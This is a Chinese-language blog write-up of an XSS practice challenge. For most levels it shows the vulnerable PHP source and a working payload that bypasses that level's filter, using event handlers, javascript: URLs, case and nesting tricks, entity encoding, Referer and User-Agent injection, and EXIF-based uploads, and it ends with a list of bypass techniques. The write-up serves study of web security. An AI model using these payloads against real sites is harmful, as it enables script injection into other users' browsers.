2019-01-03-xss_challenge

1.第一题没啥拦截和编码,直接显示,源代码如下:

ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
payload:<script>alert(1)</script>
p1

p2

2.第二题的源代码如下:

$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level2.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
payload:"><script>alert(1)</script>"这是直接把前面标签闭合的意思

可以看到进行html特殊字符的编码,经过测试以后发现,浏览器进行所谓的URL编码,然后发送到服务器端解码以后进行HTML实体编码,对',",<,>,&符号进行编码,注意单引号编码不是默认的,然后返回前端被浏览器解析,还原成xss payload弹窗,所以这是html编码只能防范存储型漏洞的意思?


p3

先看下去
3.第三题源码如下:

$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level3.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload: 123456' onfocus=alert(document.domain) autofocus//查了一下,网上说这个autofocus是当页面加载时自动获得焦点,然后onfocus是指定获得焦点时应该触发的事件.

显然是做了代替,去掉了所有的大于小于号,那就只能用事件触发了.
4.第四道同三
5.源代码如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload:1"><iframe src=javascript:alert(1)>

经测试,这道题目转换了script和on标签,那就嵌套或者伪协议


p4

然后发现嵌套不行,因为这个是转换来着.....不是直接净化掉
然后就是直接上伪协议了.


p5

6.源代码如下:

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hRef=javascript:alert(1)>xss</a>>

这道题试了挺久,结果发现啥方法都不行,然后看了下答案,发现,我去,居然没做大小写转换...,直接大小写绕过就可以了.


p6

7.源代码如下:

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hrhrefef=javasscriptcript:alert(1)>xss</a>>

主要尝试了以后发现script标签和href标签都不见,所以考虑嵌套的手段来绕过防护,最后使用<a>标签来完成


p7

8.源代码如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level7.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
payload:java&#115;cript:alert(1)

经过自己一波尝试,发现全部转小写了,然后是直接替换了,on,href,script等关键词语都被替换了,这种嵌套,伪协议,大小写全都失效了,只能看一波writeup,结果发现他是用编码绕过的,可以可以。。。。此处进行了html编码来绕过。


p8

9.源代码如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';}
else{echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';}
?>
payload:javascrip&#116;:alert(1)//http://xxx.com

看源代码可知道其实它里面会检查有没有http://在字符串里面,如果没有的话就直接跳转不成功,然后净化是先小写,然后替换,所以还是采用Unicode编码来绕,接着直接后面带上http://,但是这里要使用//注释符,注释掉后面的http://,不然会不成功。


p9

10.源代码如下:

$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
payload:123456" onmouseover=alert(document.domain) type="text

第十题主要是要让挑战者学会看源代码,这次是看不到,所以你只能看到输入点,输出点是看不到的,需要手动把他找出来,这就需要找到hidden,在前端去掉之后把输出点找出来,这里的输出点是hidden,经实测t_link和t_history不是输出点,所以不能用<,>然后就只能用事件输出了,这里用onmmouseover来触发。


p10.jpg

11.源代码如下所示:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
payload:1" onmouseover=alert(1)

这道题目和前面差不多,直接把hidden menu找出来然后直接上事件触发就可以了。而其中这个hidden的值就是包头里面的referer字段,所以burp抓包也是一样的。


p11

12.这道题目也是隐藏键值,然后改了user-agent的值插入xss代码.

<input name="t_ua" value="Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" type="hidden">
修改为:
<input name="t_ua" value="1" onmouseover=alert(1)>

p12

这里介绍一下wooyun上面一个上传新思路,通过上传图片修改图片exif信息插入xss代码,平台在查看xss代码的时候就可以直接执行了。
https://bugs.shuimugan.com/bug/view?bug_no=194934
13.如上:
p13

14.该题目为cookie注入xss代码,如下:
p14

15.这道题目主要是让人学习一波图片上传插入xss代码的思路,主要是学习利用exiftool改变图片的exif信息即可。Kali中安装了exiftool以后直接查看并修改插入,上传以后如果网站程序会查看图片exif信息的话那就会执行这些代码了。
p15

p16

确实是一个很骚的思路来着。。。。

整理一下xss绕过防护的思路:
1.大小写绕过,如果过滤了一些关键词,比如script等,直接大小写试试,对应的解决方案就是直接将输入转小写,解决。
2.伪协议,即利用一些标签,如img, iframe,a href等等,eg:<iframe src=javascript:alert(1)>,对应防御伪协议可以直接过滤掉所谓的一些伪协议标签就可以了。
3.嵌套,用于和大小写绕过一样的防护情况。。。
4.事件触发,这样可以处理一些过滤<,>等情况,例如onmouseover,onfocus等,过滤on可解决。
5.善于利用注释符号,注释一些信息。
6.编码绕过,例如stringformcharcode,html编码绕过等等。
7.上传图片含有xss代码的exif信息

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,530评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 86,403评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,120评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,770评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,758评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,649评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,021评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,675评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,931评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,659评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,751评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,410评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,004评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,969评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,203评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,042评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,493评论 2 343

推荐阅读更多精彩内容

  • 第一部分 HTML&CSS整理答案 1. 什么是HTML5? 答:HTML5是最新的HTML标准。 注意:讲述HT...
    kismetajun阅读 27,421评论 1 45
  • 之前积累了XSS 有一段时间,因为目前开始了一件有趣的工程,需要整合非常多的知识,其中Web 安全这一块出现最多的...
    刀背藏身阅读 9,027评论 0 16
  • #xss 我认为xss漏洞可以根据可控变量的输出的位置不同来进行分类 1.在html标签中输出 1.1在一般标签中...
    Der_H阅读 1,954评论 0 0
  • $HTML, HTTP,web综合问题 1、前端需要注意哪些SEO 2、 的title和alt有什么区别 3、HT...
    Hebborn_hb阅读 4,573评论 0 20
  • 一、健康气质 (健康锻炼3次)健身房运动3次。现在主要是练瑜伽,碰到舞蹈课也跟着去跳跳,出出汗。 二、思想品格 偶...
    梨涡浅笑0812阅读 186评论 0 0